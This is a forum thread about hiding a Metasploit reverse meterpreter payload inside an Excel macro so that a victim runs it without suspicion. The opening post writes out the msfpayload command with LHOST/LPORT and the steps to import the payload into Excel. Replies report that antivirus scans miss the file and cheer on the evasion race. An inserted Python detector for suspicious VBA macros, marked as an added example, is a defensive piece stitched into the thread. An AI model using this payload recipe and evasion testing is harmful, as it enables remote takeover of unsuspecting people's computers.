Thread: Alternate filetype for SE to get reverse meterpreter session

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Lightbulb Alternate filetype for SE to get reverse meterpreter session

    Someone here was looking for a non-exe file type (jpg?) so that the victim is less suspicious while running it. Well, an Excel file may be the solution.

    I used:
    1. BT3 with msf v3.3
    2. M$ office 2002 SP3 in a vista box

    First, I generated VBA code in a konsole on the BT3 box:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7777 R | ./msfencode -b '' -t vba >> /root/Desktop/meterpreter.cls
    I transferred the file to Windows, then created an Excel document and went to Tools>Macro>Visual Basic Editor. From File>Import File, I browsed to the .cls file.

    Job done!


    PS: Virustotal scans the excel file as clean. Can somebody check with Norton AV please...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  2. #2
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    This is also doable with PDF files; I remember reading an article on securinfos.infos a while back about how to do it.

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    I agree; however, the PDF file is caught by around 10 or so AVs if tested in Virustotal.

  4. #4
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    6

    Default Scanned with Norton AV 2008

    Hey,
    So I created the file and scanned it using Norton AV 2008 running version 15.5.0.23, fully patched. (This is one of the newest versions.) No threat was detected :P!! Hope this helps...

  5. #5
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Some good reading in relation to this thread.
    I have since tried it out and, well, as the study shows, it will be picked up.
    hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.
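
A defender-side counterpart to the detection article linked in post #5, as an added example that is not part of the original thread: a static triage of exported VBA module source (.cls/.bas text) that flags an auto-run entry point combined with native imports or a large numeric array. The heuristic, the threshold, the names `triage`, `NativeCall` and `example.dll`, and both sample modules are constructed assumptions; they do not reproduce msfencode output.

```python
import re

# Procedure names Office runs automatically when a file is opened.
AUTO_EXEC = re.compile(
    r'^\s*(?:public\s+|private\s+)?sub\s+(auto_?open|workbook_open|document_open)\b',
    re.I | re.M)
# Declare statements import native functions from a DLL into VBA.
DECLARE = re.compile(
    r'^\s*(?:public\s+|private\s+)?declare\s+(?:ptrsafe\s+)?'
    r'(?:function|sub)\s+(\w+)\s+lib\s+"([^"]+)"', re.I | re.M)
# Array(...) literal made only of integers: one way binary data is embedded.
NUM_ARRAY = re.compile(r'\barray\s*\(\s*((?:-?\d+\s*,\s*)+-?\d+)\s*\)', re.I)


def triage(source, min_array_len=16):
    """Return indicators found in VBA source; min_array_len is an assumed threshold."""
    # Long arrays are split with ' _' line continuations, so join them first.
    text = re.sub(r'[ \t]_[ \t]*\r?\n', ' ', source)
    findings = {
        "auto_exec": sorted({m.lower() for m in AUTO_EXEC.findall(text)}),
        "native_imports": sorted(
            {f"{lib.lower()}!{fn}" for fn, lib in DECLARE.findall(text)}),
        "largest_numeric_array": max(
            (len(m.split(",")) for m in NUM_ARRAY.findall(text)), default=0),
    }
    # Auto-run alone is common in benign workbooks; require a second indicator.
    findings["suspicious"] = bool(findings["auto_exec"]) and (
        bool(findings["native_imports"])
        or findings["largest_numeric_array"] >= min_array_len)
    return findings


# Constructed sample: placeholder import and placeholder numbers only.
SUSPICIOUS = '''Private Declare Function NativeCall Lib "example.dll" (ByVal n As Long) As Long
Sub Auto_Open()
    Dim buf As Variant
    buf = Array(1, 2, 3, 4, 5, 6, 7, 8, _
                9, 10, 11, 12, 13, 14, 15, 16, 17, 18)
End Sub
'''
# Constructed sample: ordinary macro; the auto-run name appears only in a comment.
BENIGN = '''Sub FormatReport()
    ' Sub Auto_Open() is mentioned here but never defined
    Range("A1").Value = "it's fine"
End Sub
'''

if __name__ == "__main__":
    print(triage(SUSPICIOUS))
    print(triage(BENIGN))
```
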

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by L3g10n View Post
    Hey,
    So I created the file and scanned it using Norton AV 2008 running version 15.5.0.23, fully patched. (This is one of the newest versions.) No threat was detected :P!! Hope this helps...
    Thanks..


    Quote Originally Posted by archangel.amael View Post
    Some good reading in relation to this thread.
    I have since tried it out and, well, as the study shows, it will be picked up.
    hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python
    I like the comment at the end:
    We have to keep those AV guys employed somehow - basic idea is change the loader every few months once their detection catches up. It doesn't have to be good, just different.

  7. #7
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by kazalku View Post
    I like the comment at the end:
    Well it is a "cat and mouse" game after all. Or some would say.

  8. #8
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    6

    Default

    I think they're both the cat and the mouse.... :P AV companies that is.... hehe

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by archangel.amael View Post
    Well it is a "cat and mouse" game after all. Or some would say.
    And as usual, the "mouse" is ALWAYS the winner; no matter how strong the "cat" is, the little one always finds a way to get the "cheese"...
